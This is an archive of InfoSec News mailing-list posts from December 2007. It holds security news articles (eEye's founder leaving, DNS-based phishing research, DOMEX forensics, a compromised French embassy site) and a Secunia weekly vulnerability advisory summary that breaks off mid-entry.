1. Limit remote access to users critical to maintaining business continuity; 2. Limit access to business critical services through the enterprise connection; 3. Adjust or retime automatic desktop backup software and software updates for telecommuters; 4. Obtain a telecommunications service priority (TSP) for enterprise; 5. Subscribe to government emergency telecommunications service (GETS) cards and/or wireless priority service (WPS) capabilities for critical it staff; and 6. Enhance your cyber security posture due to increased reliance on communications and it, reduced support staff, and increased threat of cyber attack. Implementing these practices will help reduce significant impacts on our nation's economy. All of us must do everything possible to keep our nation operating and delivering critical services under even the most challenging circumstances. I consider everyone in this room today a key partner in the effort to strengthen our nation's cyber infrastructure. You understand that the Internet, and the many enterprise networks that depend on it, is one of the central platforms for business operations, supply chain management, and business continuity. However, I'm more concerned about the people who aren't in this room because, as a recent business roundtable report suggests, they don't understand that this is a matter of their own business survival. Cyberspace is a profitable marketplace and enabler of market activity. But if businesses, whether in the financial services sector or otherwise, haven't made the investment in the people, processes, and technologies that will keep them operational in a crisis, our economy, in fact our very way of life, is at stake. We can't let this happen. So here's what we all need to do. First, memorize US-CERT's website address ? www.USCERT.gov ? and give it to everyone who needs it. Tell your partner organizations and businesses to sign up for the cyber security alerts and to report any potential cyber incident, threat, or attack they find. We can only act upon the information we know about. The information our partners provide increases our understanding and awareness of the health of the overall cyber infrastructure and improves our response and protective measures. Second, encourage your partners to participate in public-private partnerships like InfraGard and the financial services ISAC. These collaborations act as force multipliers for increasing awareness of cyber security challenges as well as implementing actionable and enduring solutions. Additionally, they serve as an easily accessible mechanism to educate people on how cyber vulnerabilities can have real world consequences to our physical infrastructures. Finally, encourage your colleagues to make security a part of their everyday business operations. It doesn't take long for cyber events to have real world consequences. Have them look at every step of their business lifecycle?from system configuration to in-house software development?to see if common security practices are being followed and that response plans are prepared accordingly. Help them realize that when they build a culture of security within their organizations they make great strides in ensuring the resilience of their business operations. Laws such as Sarbanes-Oxley, the Gramm-Leach-Bliley Act, and the Health Insurance Portability and Accountability Act (HIPAA) place a fiduciary responsibility on them to ensure the security of their customers' information and their systems. However, in reality, these recommendations are simply the right thing to do for their companies, their customers, their fellow citizens, and the nation as a whole. So let's work together to make it happen. Before I close, I would like to make one last comment. Thank you for your commitment to cyber security and your active participation in InfraGard. I have had a chance to work with members across the country and know what an important role you all play in our cyber security awareness efforts. I urge you to use the time at this meeting to learn as much as you can, and then share your knowledge with your colleagues, professional networks, friends and families. Cyber security is a complex problem, yes, but the dangers are easily understood, and the solution is simple: you can't guard all of cyberspace, but you can protect your piece of it. From alerts at infosecnews.org Thu Dec 13 02:05:06 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] eEye founder calls it quits Message-ID: http://www.infoworld.com/article/07/12/12/eEye-founder-calls-it-quits_1.html By Robert McMillan IDG News Service December 12, 2007 eEye Digital Security founder Marc Maiffret has left the company and plans to launch a new venture, developing next-generation mobile phone software for the corporate world. A noted hacker, Maiffret co-founded eEye in the late 1990s with Firas Bushnaq and had served as the company's CTO, overseeing a staff of about 30 engineers. Bushnaq stepped down as CEO in 2006, and Maiffret said that he'd started thinking about leaving to pursue other startup ideas earlier this year. "I'd been doing it a long time," he said Wednesday. "I started the company when I was 17 and had been doing it the last 10 years." The 70-person company, based in Aliso Viejo, California, has been going through some bumpy times lately. Bushnaq's replacement, Ross Brown, was fired earlier this year, and eEye also recently shut down its Orange County sales offices. Maiffret said that this had nothing to do with his departure and that he's leaving eEye in good shape, however. "Today, it's pretty much an engine that's been running itself," he said. He stopped working for eEye in September but didn't announce his departure until this week. eEye representatives could not be reached immediately for comment, but Maiffret said that the company has not yet found a replacement CTO. He will be doing some consulting work and developing the new software for Windows- and Blackberry-powered mobile phones, which he expects to unveil in the first quarter of next year. "Everybody has these miniature computers in their pockets, but nobody is doing anything interesting with them," he said. Although the new product will not be security-related, Maiffret said he expects to remain involved in the security research community, where he also plans to do consulting work as a self-described "CTO for hire." "I'll probably be more involved in [security research] now," he said, "because being CTO of eEye didn't leave me with a lot of personal time to do hands-on research." From alerts at infosecnews.org Thu Dec 13 02:05:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] DNS attack could signal Phishing 2.0 Message-ID: Forwarded from: Crypto Admin On 12/11/07, InfoSec News wrote: > http://www.infoworld.com/article/07/12/11/DNS-attack-could-signal-Phishing-2.0_1.html > > By Robert McMillan > IDG News Service > December 11, 2007 > > Researchers at Google and the Georgia Institute of Technology are > studying a virtually undetectable form of attack that quietly controls > where victims go on the Internet. Please read the comments on this article over at CircleID, where it is pointed out that the data does not support any difficulties with open recursive DNS servers, but rather with misconfigured DNS servers. Both David A. Ulevitch and Brett Watson make the points far better than I could. http://www.circleid.com/posts/malicious_open_recursive_dns_servers/ The authors of this report would have done themselves a favor, had they listened to their reviewers. From alerts at infosecnews.org Thu Dec 13 02:05:36 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Document & Media Exploitation: The DOMEX challenge is to turn digital bits into actionable intelligence. Message-ID: http://www.acmqueue.com/modules.php?name=Content&pa=showpage&pid=512 By Simson L. Garfinkel, Ph.D. ACM Queue vol. 5, no. 7 November/December 2007 A computer used by Al Qaeda ends up in the hands of a Wall Street Journal reporter. A laptop from Iran is discovered that contains details of that country's nuclear weapons program. Photographs and videos are downloaded from terrorist Web sites. As evidenced by these and countless other cases, digital documents and storage devices hold the key to many ongoing military and criminal investigations. The most straightforward approach to using these media and documents is to explore them with ordinary tools - open the word files with Microsoft Word, view the Web pages with Internet Explorer, and so on. Although this straightforward approach is easy to understand, it can miss a lot. Deleted and invisible files can be made visible using basic forensic tools. Programs called carvers can locate information that isn't even a complete file and turn it into a form that can be readily processed. Detailed examination of e-mail headers and log files can reveal where a computer was used and other computers with which it came into contact. Linguistic tools can discover multiple documents that refer to the same individuals, even though names in the different documents have different spellings and are in different human languages. Data-mining techniques such as cross-drive analysis can reconstruct social networks - automatically determining, for example, if the computer's previous user was in contact with known terrorists. This sort of advanced analysis is the stuff of DOMEX, the little-known intelligence practice of document and media exploitation. The U.S. intelligence community defines DOMEX as "the processing, translation, analysis, and dissemination of collected hard-copy documents and electronic media, which are under the U.S. government's physical control and are not publicly available."1 That definition goes on to exclude "the handling of documents and media during the collection, initial review, and inventory process." DOMEX is not about being a digital librarian; it's about being a digital detective. Although very little has been disclosed about the government's DOMEX activities, in recent years academic researchers - particularly those concerned with electronic privacy - have learned a great deal about the general process of electronic document and media exploitation. My interest in DOMEX started while studying data left on hard drives and memory sticks after files had been deleted or the media had been "formatted." I built a system to automatically copy the data off the hard drives, store it on a server, and search for confidential information. In the process I built a rudimentary DOMEX system. Other recent academic research in the fields of computer forensics, data recovery, machine translation, and data mining is also directly applicable to DOMEX. This article introduces electronic document and media exploitation from that academic perspective. It presents a model for performing this kind of exploitation and discusses some of the relevant academic research. Properly done, DOMEX goes far beyond recovering documents from hard drives and storing them in searchable archives. Understanding this engineering problem gives insight that will be useful for designing any system that works with large amounts of unstructured, heterogeneous data. Why "Exploitation?" When researchers say that their work is centered on information or document "exploitation," eyebrows invariably raise. The word exploitation is provocative, attracting unwarranted attention to a process that could just as easily be classified as "computer forensics" or even "data recovery." But, in fact, the word is apropos. The words exploit and exploitation imply using something in a manner that's "unfair or selfish."2 And it's true. People who are in the business of document and media exploitation really do seek to make unfair use of computer documents and electronic storage devices. Fair, after all, means following the rules. The "rules" of a computer system are the APIs, the data-storage standards, the file permissions, and other interfaces that were intended to be used by the file's creator. When a file in the computer's electronic trash is deleted by "emptying the trash," the rules say that the file's contents should no longer be accessible. The "undelete" command that is part of every forensic toolkit takes advantage of the fact that computer systems generally do not overwrite the contents of deleted files. This is a common problem in computer systems, affecting not only deleted files in file systems but also deleted paragraphs in word processors and even unallocated pages in virtual memory systems. Computer forensic practitioners working for police departments and litigation support firms also make their living by recovering intentionally deleted data, but even these processes follow rules - though those involved in exploitation might choose to ignore them. The goal of computer forensics is to assist in some kind of investigation, which usually begins because a crime was committed and, hopefully, ends with the perpetrator being convicted in a court of law. With conviction as a goal, forensic practitioners must be concerned with the evidentiary integrity and chain of custody - and they need to limit their search to information that is relevant to that investigation. In many cases the evidence will have been obtained under a search warrant or discovery procedure, the terms of which may limit the forensic examiner's actions or even which kinds of files may be examined. Evidence obtained by breaking the rules may even be suppressed. For example, in the case of U.S. v. Carey, an investigator executing a warrant on narcotics discovered files with a JPG extension that contained child pornography. Carey was indicted and convicted for possession of child pornography, but the appellate court reversed the ruling and remanded the case back to the trial court, arguing that "the seizure of evidence was beyond the scope of the warrant."3 The evidence should have been suppressed. Unlike the investigators in the Carey case, those engaged in document and media exploitation are not bound by any rules other than laws of physics and nature. The goal of information exploitation is to get and use the data - the ends justify the means. It's OK if these results aren't good enough for a conviction. Exploitation rarely seeks to prove or disprove the details of a case; instead, it seeks to make the fullest use of all the data that has been obtained. The standard of success is the usefulness of the result, not the reliability of the process. If you find the preceding paragraph alarming, remember that DOMEX is about exploiting data, not people. "Exploitation" is precisely the attitude that you want when you take a crashed hard drive to a data-recovery firm. If you've just lost the only copy of a 400-page manuscript, it's probably OK with you if the firm is able to recover the first 200 pages of the September 20 version and the last 180 pages of the August 19 version. Although a good defense attorney might be able to suppress a document that was made by stitching together those two halves, you probably don't care about that if you are the author and the alternative is rewriting the 400 pages from memory. Likewise, if you are using some kind of desktop search system to index the files on your hard drive, you don't mind if the product makes a mistake or two and shows you files that you aren't "allowed" to see - just as long as you find what you're searching for. [...] From alerts at infosecnews.org Thu Dec 13 02:05:48 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Fewer connections could limit cyber attacks, agency official says Message-ID: http://www.govexec.com/story_page.cfm?articleid=38817 By Aliya Sternstein Technology Daily December 12, 2007 A Justice Department cyber-security official on Wednesday touted the government's strategy of reducing its number of Internet connections to 50 by June in order to reduce cyber vulnerabilities. The government's "Trusted Internet Connections" initiative, which was announced last month, will help protect information by shrinking the attack surface area -- or the number of access gateways that must be monitored, Mischel Kwon, the department's chief information technology security specialist, told a group of federal government IT professionals. "This is an absolutely great, great program," Kwon said. She said the effort cuts to the core of today's cyber-security problem: The basic threats are the same as they were in 2001, but the maneuvers are easier and more widespread. Kwon told the Association for Federal Information Resources Management that the threats are still hackers, "hacktivists," industrial spies, organized crime groups, terrorists and national governments. But now, the fraudsters can easily create Internet viruses by reading how-to lessons on the Internet itself, said Kwon, who runs Justice's cyber-defense operation. The most popular attack right now, she said, is "in by e-mail, out by Web." The culprits send a message embedded with a link, and then dupe the victim into clicking on the link to go to a separate Web page where they enter sensitive information or download malevolent software. Once the exercise is complete, the intruder can enter the victims' networks, and "we're all in business," Kwon said. She warned the audience not to assume that all such "phishing" e-mail messages have a misspelling "because it will fool everyone." From alerts at infosecnews.org Thu Dec 13 02:05:59 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Man suspected of videotaping women in a restroom Message-ID: http://www.dailybreeze.com/ci_7702097 By Larry Altman Staff Writer 12/12/2007 A worker at a Gardena aerospace parts manufacturer attached a tiny camera in a restroom and transmitted video of at least one woman to his desk as she used a toilet, police said today. Ryan Castillo, 29, was arrested Tuesday at his home in the unincorporated area between Harbor Gateway and Carson, Gardena police Lt. Ed Burnett said. At first, officials at Space-Lok Inc. at 13306 Halldale Ave. suspected that Castillo had hacked into files in the firm's computer network and e-mail system. But when they began examining his computer Monday, they found something else on his desk - an iPod-sized receiver with a small video screen, Burnett said. On it, they discovered, several video clips of a female employee using the company restroom, police said. "It was being wireless transferred to this receiver," Burnett said today. "It's still early on. We don't know how many people are in the video clips." So far, police know of one particular woman who appeared to be targeted. Castillo, police said, attached sugar-cube sized cameras on drain pipes under the sinks in two restrooms, covering them with insulation. The cameras' pinhole-sized lenses pointed at the toilets, which were across from the sinks. The bathrooms, used by both men and women, had one toilet and a sink, with no stall. Burnett said investigators do not know if Castillo was watching live. A couple of wires on the cameras transmitted to the receiver at his desk. Police confiscated his computer and are examining it for evidence. Officers booked Castillo at the Gardena jail on suspicion of unauthorized access to a computer network, which is a felony. He also was held on suspicion of observing a person in a restroom, a misdemeanor. He was released after posting $30,000 bail. Officials at Space-Lok are looking into what files Castillo allegedly hacked. They will provide that information to police, Burnett said. It was unclear what Castillo did at the company. A company official hung up when a reporter contacted him today at the business. From alerts at infosecnews.org Thu Dec 13 02:06:11 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Man makes toaster hack computer Message-ID: http://www.expressindia.com/latest-news/Man-makes-toaster-hack-computer/249695/ By Chandan Haygunde December 13, 2007 Pune - Can you imagine a toaster hacking a computer? That?s true. In fact any kitchen appliance can be used for attacking your computer system, said Dror Shalev, a hacker from Israel, during the international convention of hackers ?Clubhack 2007? held recently. In his demonstration at the convention, Shalev left the audience amazed by actually hacking a computer with a toaster. Shalev, who is a security expert at Check Point Software Technologies in Israel, was one of the foreign speakers at the international convention. He said that any home device could be connected with a software prototype to hack a computer. ?I read a senior scientist from Google saying there was no need to be afraid of a toaster at home,? Shalev told The Indian Express. ?But as a hacker I came up with a toaster that could actually hack a computer. I call it a ?Crazy Toaster?.? Simplifying the functions of ?Crazy Toaster,? Shavel said he developed a software and networked it with the toaster. ?As soon as the toaster is plugged, the software is activated before it breaks into the user?s computer system. The same software prototype can be networked with any home appliance for stealing the web secrets,? he said. ?With wireless technology available, there is no need for connecting the appliance with the computer.? Shalev said he just wanted to convey that one couldn?t blindly trust ?anything? in the world of internet. ?As the usage of computers and internet goes up, we will need to be cautious about every object in our surroundings,? he said, suggesting people purchase home appliances of branded companies. ?If an appliance or home device comes as a gift, accept it only if it is from someone you trust.? Shalev also said people should believe in ethical hackers like him, who were doing constructive work for security firms, and doing work just for the love of programming and not for money. ?Hackers play a crucial role in developing a good product and save millions of dollars by ensuring that precious databases and information are not compromised.? Appreciating the initiative taken by the Indian hackers to organise Clubhack, he said such conventions should be arranged on regular basis. ?The world is turning into a global village. But this village is not secure in terms of the cyber crimes,? he said. ?It is necessary for ethical hackers across the globe to converge and share knowledge.? From alerts at infosecnews.org Fri Dec 14 00:21:02 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] French Embassy Web site for Libya said to be serving up malware Message-ID: http://www.networkworld.com/news/2007/121307-libya-site-malware.html By Ellen Messmer Network World 12/13/07 The French Embassy Web site for Libya has been compromised and is serving up malware to visitors, according to McAfee. McAfee researcher Francois Paget discovered Thursday and the company says it has reported its findings to the French government. The site has been attacked using an iFrame exploit that inserts an invisible frame in the page in order to re-direct some Web browser connections to another location, which serves up a "downloader," code that attempts to reside on the victim machine. If the downloader is successful, the attacker can then remotely attempt to download other malware, "typically a bot or a password-stealing Trojan," says Dave Marcus, McAfee security researcher and communications manager. Marcus says Paget, a researcher with tools to scan scripts and investigate code behavior, happened by chance to be looking at the French Embassy Web site for Libya and discovered the attack code on it. The incident is similar to discoveries made by security researchers of other compromised Web sites spewing attack code, including that of the Bank of India and the MySpace page of Alicia Keys. McAfee says the attack on the French Web site is being carried out via routing through a Hong Kong provider and then to sites in Russia and the Ukraine. All contents copyright 1995-2007 Network World, Inc. From alerts at infosecnews.org Fri Dec 14 00:21:26 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Secunia Weekly Summary - Issue: 2007-50 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2007-12-06 - 2007-12-13 This week: 100 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. Get a free trial of the Secunia Vulnerability Intelligence Solutions: http://corporate.secunia.com/how_to_buy/38/vi/?ref=summary_sm ======================================================================== 2) This Week in Brief: Secunia Research has discovered a vulnerability in Samba, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused by a boundary error within the "send_mailslot()" function. This can be exploited to cause a stack-based buffer overflow with zero bytes via a specially crafted "SAMLOGON" domain logon packet containing a username string placed at an odd offset followed by an overly long GETDC string. Successful exploitation allows execution of arbitrary code, but requires that the "domain logons" option is enabled. The vulnerability is confirmed in version 3.0.27a and is fixed in version 3.0.28. The vendor has also released a patch for 3.0.27a. For more information: http://secunia.com/advisories/27760/ -- Some vulnerabilities have been discovered in the MPEG-4 format from 3ivx, which can be exploited by malicious people to compromise a user's system. The vulnerabilities are caused due to boundary errors in 3ivxDSMediaSplitter.ax when processing certain atoms ("art", "nam", "cmt", "des", and "cpy") in MP4 files. These can be exploited to cause stack-based buffer overflows via a specially crafted MP4 file. Successful exploitation allows execution of arbitrary code. The vulnerabilities are confirmed in version 5.0.1 of the file, with the following applications as attack vectors: * Windows Media Player version 6.4.09.1130 (mplayer2.exe) * Media Player Classic version 6.4.9.0 Other versions and applications may also be affected. The vulnerabilities are currently unpatched. For more information: http://secunia.com/advisories/27998/ -- Microsoft released its last batch of Security Bulletins for the year. Seven Security Bulletins were released, with one Extremely Critical advisory, two Highly Critical advisories, two Moderately Critical advisories, and two Less Critical advisories. The Extremely Critical advisory discusses a cumulative update for Internet Explorer. One of the vulnerabilities discussed in the advisory is reportedly currently being exploited to execute arbitrary code. For more information: http://secunia.com/advisories/28036/ Several highly critical vulnerabilities in the Windows Media Format Runtime / Windows Media Services were also disclosed, which could be exploited to execute arbitrary code. For more information: http://secunia.com/advisories/28034/ Two highly critical vulnerabilities in Microsoft DirectX were also reported, which could be exploited to execute arbitrary code. For more information: http://secunia.com/advisories/28010/ Two moderately critical vulnerabilities, one in the Message Queuing Service (MSMQ) in Windows, and another in Vista SMBv2 signing, can be exploited to cause arbitrary code, but requires that the MSMQ component is installed (not the default setting), and SMBv2 is enabled (not the default setting), respectively. For more information: http://secunia.com/advisories/28051/ http://secunia.com/advisories/27997/ Two less critical vulnerabilities, one in Windows Advanced Local Procedure Call (ALPC) in Vista, and another in Message Queuing Service (MSMQ) can be exploited to allow malicious, local users to gain escalated privileges. For more information: http://secunia.com/advisories/28015/ http://secunia.com/advisories/28011/ Users are urged to run Windows Updates as soon as possible. Secunia has constructed the Secunia Personal Software Inspector, which you can use to check if your personal system is vulnerable: https://psi.secunia.com/ Corporate users can request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable: http://secunia.com/network_software_inspector/ -- VIRUS ALERTS: During the past week Secunia collected 257 virus descriptions from the Antivirus vendors. However, none were deemed MEDIUM risk or higher according to the Secunia assessment scale. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA27934] Skype skype4com URI Handler Buffer Overflow 2. [SA28036] Internet Explorer Multiple Code Execution Vulnerabilities 3. [SA27938] Mac OS X vpnd Denial of Service Vulnerability 4. [SA27947] Cisco Security Agent Unspecified System Driver Buffer Overflow Vulnerability 5. [SA27945] Nokia N95 SIP Message Processing Denial of Service Weakness 6. [SA27889] e2fsprogs libext2fs Integer Overflow Vulnerabilities 7. [SA27941] IBM Lotus Sametime Meeting WebRunMenuFrame Page Cross-Site Scripting 8. [SA27964] HP OpenView Network Node Manager Multiple Vulnerabilities 9. [SA27965] SUSE Update for Multiple Packages 10. [SA27898] Cisco IP Phone 7940 SIP INVITE Denial of Service Vulnerability ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA28036] Internet Explorer Multiple Code Execution Vulnerabilities [SA27992] JustSystems Ichitaro Document Processing Buffer Overflow [SA28055] HP Info Center HPInfo Class ActiveX Control Insecure Methods [SA28034] Windows Media Format Runtime ASF Parsing Vulnerabilities [SA28031] BadBlue Multiple Vulnerabilities [SA28010] Microsoft DirectX SAMI/WAV/AVI File Parsing Vulnerabilities [SA27998] 3ivx MPEG-4 MP4 File Processing Buffer Overflows [SA28038] Trend Micro Products UUE File Parsing Buffer Overflow [SA28032] BarracudaDrive Web Server Multiple Vulnerabilities [SA28007] Easy File Sharing Web Server Multiple Vulnerabilities [SA27976] PenPal Three SQL Injection Vulnerabilities [SA28051] Microsoft Windows Message Queuing Buffer Overflow [SA27997] Microsoft Windows Vista SMBv2 Signing Vulnerability [SA28019] Websense "username" Cross-Site Scripting Vulnerability [SA28015] Windows Vista Kernel Legacy Reply Path Validation Privilege Escalation [SA28011] Microsoft Windows Message Queuing Privilege Escalation [SA28072] Kerio WinRoute Firewall Proxy Server Unspecified Security Bypass UNIX/Linux: [SA28068] Sun Solaris update for Adobe Flash Player [SA28056] Red Hat update for java-1.4.2-bea [SA28043] Fedora update for poppler [SA28039] SUSE update for OpenOffice_org [SA28001] Debian update for iceweasel [SA27979] Fedora update for seamonkey [SA27972] Fedora update for openoffice.org [SA28060] Debian update for ruby-gnome2 [SA28050] Red Hat update for python [SA28044] IBM AIX Multiple Unspecified Vulnerabilities [SA28041] Avaya Products PCRE Multiple Vulnerabilities [SA28033] Debian update for kernel [SA28027] Red Hat update for python [SA28022] Gentoo update for ruby-gtk2 [SA28021] Gentoo update for emul-linux-x86-qtlibs [SA28008] Debian update for sitebar [SA28002] wwwstats "link" Script Insertion Vulnerability [SA27996] Debian update for qt-x11-free [SA27989] Fedora update for eggdrop [SA27985] Gentoo update for cairo [SA27984] Gentoo update for emacs [SA27975] Fedora update for ruby-gnome [SA27973] Fedora update for drupal [SA28067] Mandriva update for samba [SA28029] Gentoo update for samba [SA28028] rPath update for samba and samba-swat [SA28003] SUSE update for samba [SA27999] Debian update for samba [SA27993] Slackware update for samba [SA27982] Gentoo update for firebird [SA27977] Fedora update for samba [SA28062] Debian update for htdig [SA28061] Debian update for libnss-ldap [SA28042] Mandriva update for e2fsprogs [SA28030] rPath update for e2fsprogs [SA28000] Ubuntu update for e2fsprogs [SA27987] Debian update for e2fsprogs [SA27983] Gentoo update for PEAR-MDB2 [SA27980] Fedora update for nagios [SA27971] Avaya Products Apache mod_proxy "date" Denial of Service [SA27967] Ubuntu update for tetex-bin and texlive-bin [SA28040] Mandriva update for MySQL [SA28052] Red Hat autofs "/net" Privilege Escalation Vulnerability [SA28023] Gentoo update for lookup [SA28004] Fedora update for xorg-x11-xfs [SA27978] Fedora update for zabbix [SA28070] Linux Kernel "mmap_min_addr" Security Bypass [SA28057] Avaya CMS / IR Solaris Remote Procedure Call Module Denial of Service [SA28048] Mac OS X "cs_validate_page()" Local Denial of Service Other: [SA27970] IBM HMC Version 3 Privilege Escalation Vulnerabilities Cross Platform: [SA28066] ViArt CMS/HelpDesk/Shop "root_folder_path" File Inclusion [SA28058] CityWriter "path" File Inclusion Vulnerability [SA28054] Fastpublish CMS designconfig.php File Inclusion [SA28047] Falcon Series One Multiple Vulnerabilities [SA28018] Sun StarOffice/StarSuite Database Document Processing Arbitrary Java Method Execution [SA27974] Novell NetMail AntiVirus Agent Integer Overflow Vulnerability [SA28080] Robocode Arbitrary Java Code Execution Security Issue [SA28075] MMS Gallery PHP "id" File Inclusion Vulnerabilities [SA28071] xml2owl "file" Information Disclosure Vulnerability [SA28053] Mcms Easy Web Make "template" Local File Inclusion [SA28045] Falt4 CMS Cross-Site Scripting and SQL Injection Vulnerabilities [SA28035] Cybozu Office Multiple Vulnerabilities [SA28014] aurora framework "pack_var()" SQL Injection Vulnerability [SA28013] PolDoc Document Management System "filename" Information Disclosure [SA27990] DWdirectory "search" SQL Injection Vulnerability [SA27988] Ace Image Hosting Script "id" SQL Injection Vulnerability [SA27986] Content Injector "id" SQL Injection Vulnerability [SA28082] Hitachi Web Server Cross-Site Scripting Vulnerabilities [SA28081] Apache mod_imap Module Cross-Site Scripting Vulnerability [SA28078] BEA WebLogic Mobility Server Image Converter Security Bypass [SA28077] JBoss Seam "order" EJBQL Injection Vulnerability [SA28073] Apache mod_imap Module Cross-Site Scripting Vulnerability [SA28069] Rainboard Unspecified Cross-Site Scripting [SA28063] MySQL Security Issue and Two Vulnerabilities [SA28049] Cybozu Products Cross-Site Scripting and HTTP Header Injection [SA28046] Apache mod_imagemap Module Cross-Site Scripting Vulnerability [SA28024] bitweaver Cross-Site Scripting Vulnerabilities [SA28012] Serendipity Remote RSS Sidebar Plugin Script Insertion [SA28006] WebSPELL Multiple Cross-Site Scripting Vulnerabilities [SA28005] WordPress GBK/Big5 Character Set "s" SQL Injection [SA27966] OpenNewsletter "type" Cross-Site Scripting [SA28026] Websense User-Agent Filtering Bypass Security Issue [SA27981] MySQL System Table Information Overwrite Vulnerability ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA28036] Internet Explorer Multiple Code Execution Vulnerabilities Critical: Extremely critical Where: From remote Impact: System access Released: 2007-12-11 Some vulnerabilities have been reported in Internet Explorer, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28036/ -- [SA27992] JustSystems Ichitaro Document Processing Buffer Overflow Critical: Extremely critical Where: From remote Impact: System access Released: 2007-12-13 A vulnerability has been reported in JustSystems Ichitaro, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27992/ -- [SA28055] HP Info Center HPInfo Class ActiveX Control Insecure Methods Critical: Highly critical Where: From remote Impact: Manipulation of data, Exposure of system information, System access Released: 2007-12-12 porkythepig has reported some vulnerabilities in HP Info Center, which can be exploited by malicious people to gain knowledge of certain system information, manipulate registry data, and to compromise a user's system. Full Advisory: http://secunia.com/advisories/28055/ -- [SA28034] Windows Media Format Runtime ASF Parsing Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-11 IBM X-Force has reported four vulnerabilities in Windows Media Format Runtime / Windows Media Services, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28034/ -- [SA28031] BadBlue Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Exposure of sensitive information, System access Released: 2007-12-11 Luigi Auriemma has reported some vulnerabilities in BadBlue, which can be exploited by malicious people to disclose sensitive information, bypass certain security restrictions, and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28031/ -- [SA28010] Microsoft DirectX SAMI/WAV/AVI File Parsing Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-11 Two vulnerabilities have been reported in Microsoft DirectX, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28010/ -- [SA27998] 3ivx MPEG-4 MP4 File Processing Buffer Overflows Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-10 SYS 49152 has discovered some vulnerabilities in 3ivx MPEG-4, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27998/ -- [SA28038] Trend Micro Products UUE File Parsing Buffer Overflow Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-12 Sowhat has reported a vulnerability in some Trend Micro products, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28038/ -- [SA28032] BarracudaDrive Web Server Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data, Exposure of system information, Exposure of sensitive information, DoS Released: 2007-12-11 Luigi Auriemma has reported some vulnerabilities in BarracudaDrive Web Server, which can be exploited by malicious users to manipulate certain data and cause a DoS (Denial of Service), and by malicious people to conduct script insertion attacks and disclose sensitive information. Full Advisory: http://secunia.com/advisories/28032/ -- [SA28007] Easy File Sharing Web Server Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information, System access Released: 2007-12-10 Luigi Auriemma has reported some vulnerabilities in Easy File Sharing Web Server, which can be exploited by malicious people to disclose sensitive information and by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28007/ -- [SA27976] PenPal Three SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-07 Aria-Security Team have reported some vulnerabilities in PenPal, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27976/ -- [SA28051] Microsoft Windows Message Queuing Buffer Overflow Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28051/ -- [SA27997] Microsoft Windows Vista SMBv2 Signing Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 A vulnerability has been reported in Microsoft Windows Vista, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27997/ -- [SA28019] Websense "username" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-11 Dave Lewis has reported a vulnerability in Websense Enterprise and Websense Web Security Suite, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28019/ -- [SA28015] Windows Vista Kernel Legacy Reply Path Validation Privilege Escalation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-11 A vulnerability has been reported in Microsoft Windows Vista, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/28015/ -- [SA28011] Microsoft Windows Message Queuing Privilege Escalation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-11 A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/28011/ -- [SA28072] Kerio WinRoute Firewall Proxy Server Unspecified Security Bypass Critical: Not critical Where: Local system Impact: Security Bypass Released: 2007-12-13 A weakness has been reported in Kerio WinRoute Firewall, which potentially can be 